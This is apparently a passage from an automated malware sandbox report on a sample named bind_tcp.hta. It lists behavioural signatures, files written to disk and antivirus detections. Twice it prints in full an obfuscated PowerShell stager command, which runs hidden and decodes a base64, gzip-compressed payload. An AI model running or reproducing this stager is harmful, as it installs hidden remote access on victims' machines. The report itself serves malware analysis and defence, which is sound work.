YOsgeLX1mDju24U1Tk27siet3rD82jRSo2mrZNyZqNluXTXMF4E1pfbFCwSCim20f5lBRL{2}uWk1qmw8577au7SaN7O2G20eouwwlPvZNpxzCM0wB33B1CFg+a7u6mfsVHth9ZhjHOesiC66233asvuB0hvOkY9Q{1}vT8Y'+'daky4hRc9frIw'+'wtbQGLPGoo16W4uS24fz7u0Ndvt3g0Zo1Kc3qNMaTyVO4wZt{1}ozu4cjxDbZH6eWRbdTHBObjbDSxpW2EF1eTMdhq+MvQOJ10jpB11J+mDbyyeO5N9{2}YBXSy{1}6+6Qwf7ousHRmA1uMOrf7roG{1}DdsIbtlI99db+Ob9ebj40bg3gQvrJ'+'Fxev35A8R7dk1j0WzMK9H2diyL4vt3FWatHg7C{2}lrRd3GSLjEDOkA1L7Oyy5NuUZ+H{1}EoNTZONfkWSmDBojdA8Sy4jxrgv20N'+'eyKE17RuG7F{2}XTu7VSzNd'+'eRLU{1}9tGuXR2dgtOQ{1}4AdWt9Ei{2}Esmpum6YJ1d7cmq08D95+szZf7zRpqyrbRY5MYZvltsEcDRVN++'+'VYwatAQHV6Ha3XgIOjV1BMoLrtU1zCZ3HODsEr7vXEhQPsALQ63HwmHwQ5R8DAMXlQKkJ2y8PuW2H357+UNUWhWsJf8G+seV77h903Mcms7tH5af{1}HhYMa{2}+sQmGAqQNCDisvI{'+'2}hHwMhBFphxG+P4c8iAsh{1}wbX2bieABvrbzm{2}wXRA8aElQsAAA{0}{0}')-f'=','n','/')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000458	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05620000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 31, 2024, 10:02 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 31, 2024, 10:02 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAIsy12UCA7VWbW{2}iOBD+vtL+h2iFlES'+'lJLyou6200jlQmiBC2YZCKYtObuKAixPTxClwe{2}vfbxySlr1t73o{1}rSWEY8+Mx888M+Mwi31BeaysviDl2{2}t3SjGGOMGRolX4Q1pVK{1}xZ753qz7uVMKh{2}VD4r2gyt1x0eYRr'+'Pz87aWZKQWOy{2}axdEoDQl0'+'R2jJNV05U9lsiQJOb68uye+'+'UL4pld9rF4zfYVaI7drYXxLlGMWB3OtzH0vPat6aUaGpX7+q+uy4Pq+dP2SYpZrq7VJBolrAmKor33V54Gi3JprqUj{2}hKQ9FbULjZqN2Hac4JAOw9khcIpY8SFW4zPN1EiKyJN7fSprZC2kqTIcJ91EQJCRN1aoykwfM5vPftFlx+lUWCxqRmhMLkvC1R5JH6pO0ZuM4YOSKhHPQ8'+'kRC48Vc10Hska+'+'IVokzxqrKfzGjDcimxO6tStqhEkgNRaJXIagv3NPlQcbIXlN9wVFJBB3GExkAwO8Sw7AkEHU6Fy8w6HmhH'+'LN8h4DP2pC{1}NF'+'f+rJhVxYXTseDJDj4royQj+vwJcaWSruvd6'+'lut1UtVUGQMFmZjToP5s{2}oP8a88bi8dKfQ6mzskpDHp7GIcUb8krPZSUEjISI5IrRQbgH+aWmyQoEM'+'YWWAhYZbc+E{1}tPKLiSdfKKAtIg{1}wIbApeQcz1H53ZR05T{1}dglEYC3{2}wayVkJIE1JKF6mxK0+X3yCkthlOIcWHGeSpX1U8ghkJqgq'+'KU1psoUzwfKo+u+tmTF'+'Afp6I0N9f{2}BmdxbJvHqUgyH8IKEIy8NfEpZhKRqmLTgFg7jy7K49UX8WhjxiB9wNIjxANWJA6ekGRJwNOcGHrNI8KJ1oxEIJPXjS7DC6gSRZLk7MILEqivOFrmwp74EpkSkgM3Idwe46KqjGkioApJlGV+{2}A8ffq4+uTPthBTB0coMm1k7IVOggu26JGmBUI5HIgCLbsIjC6fkpLUvNNoH45IOEYypEzM36K1o3d{1}Az4XftRse9X26GAqTR67fTocX3U+IbhYb{2}9MA+UEvIKfeuCW8c0e0h8j+Qk2rtfQtcwTza0c4F46YOsgeLX1mDju24U1Tk27siet3rD82jRSo2mrZNyZqNluXTXMF4E1pfbFCwSCim20f5lBRL{2}uWk1qmw8577au7SaN7O2G20eouwwlPvZNpxzCM0wB33B1CFg+a7u6mfsVHth9ZhjHOesiC66233asvuB0hvOkY9Q{1}vT8Y'+'daky4hRc9frIw'+'wtbQGLPGoo16W4uS24fz7u0Ndvt3g0Zo1Kc3qNMaTyVO4wZt{1}ozu4cjxDbZH6eWRbdTHBObjbDSxpW2EF1eTMdhq+MvQOJ10jpB11J+mDbyyeO5N9{2}YBXSy{1}6+6Qwf7ousHRmA1uMOrf7roG{1}DdsIbtlI99db+Ob9ebj40bg3gQvrJ'+'Fxev35A8R7dk1j0WzMK9H2diyL4vt3FWatHg7C{2}lrRd3GSLjEDOkA1L7Oyy5NuUZ+H{1}EoNTZONfkWSmDBojdA8Sy4jxrgv20N'+'eyKE17RuG7F{2}XTu7VSzNd'+'eRLU{1}9tGuXR2dgtOQ{1}4AdWt9Ei{2}Esmpum6YJ1d7cmq08D95+szZf7zRpqyrbRY5MYZvltsEcDRVN++'+'VYwatAQHV6Ha3XgIOjV1BMoLrtU1zCZ3HODsEr7vXEhQPsALQ63HwmHwQ5R8DAMXlQKkJ2y8PuW2H357+UNUWhWsJf8G+seV77h903Mcms7tH5af{1}HhYMa{2}+sQmGAqQNCDisvI{'+'2}hHwMhBFphxG+P4c8iAsh{1}wbX2bieABvrbzm{2}wXRA8aElQsAAA{0}{0}')-f'=','n','/')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Lionic	Trojan.Script.Agent.4!c
MicroWorld-eScan	Trojan.Script.905440
CAT-QuickHeal	Script.Trojan.42447
Skyhigh	BehavesLike.HTML.Dropper.zr
ALYac	Trojan.Script.905440
VIPRE	Trojan.Script.905440
Sangfor	Malware.Generic-VBS.Save.facd9283
Baidu	VBS.Trojan-Downloader.Agent.va
Symantec	VBS.Heur.SNIC
ESET-NOD32	VBS/Agent.NUI
McAfee	PS/Injector.d
Avast	VBS:Obfuscated-GQ [Cryp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.VBS.Agent.gen
BitDefender	Trojan.Script.905440
NANO-Antivirus	Trojan.Html.Downloader.fqlyhy
Rising	Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP)
Emsisoft	Trojan.Script.905440 (B)
F-Secure	Backdoor:HTML/PowerShellStager.A
DrWeb	Trojan.Siggen28.52646
FireEye	Trojan.Script.905440
Sophos	Mal/PSDL-B
Ikarus	Trojan.PowerShell.Agent
Google	Detected
Avira	VBS/PSRunner.VPA
Kingsoft	Win32.Infected.AutoInfector.a
Gridinsoft	Trojan.U.Gen.tr
Xcitium	TrojWare.VBS.Agent.NUI@8a4oj4
Arcabit	Trojan.Script.DDD0E0
ZoneAlarm	HEUR:Trojan.VBS.Agent.gen
GData	Trojan.Script.905440
Varist	VBS/Agent.AXB!Eldorado
Tencent	Heur:Trojan.Powershell.Generic.d
MAX	malware (ai score=89)
Fortinet	VBS/Inject.B!tr
AVG	VBS:Obfuscated-GQ [Cryp]

bind_tcp.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All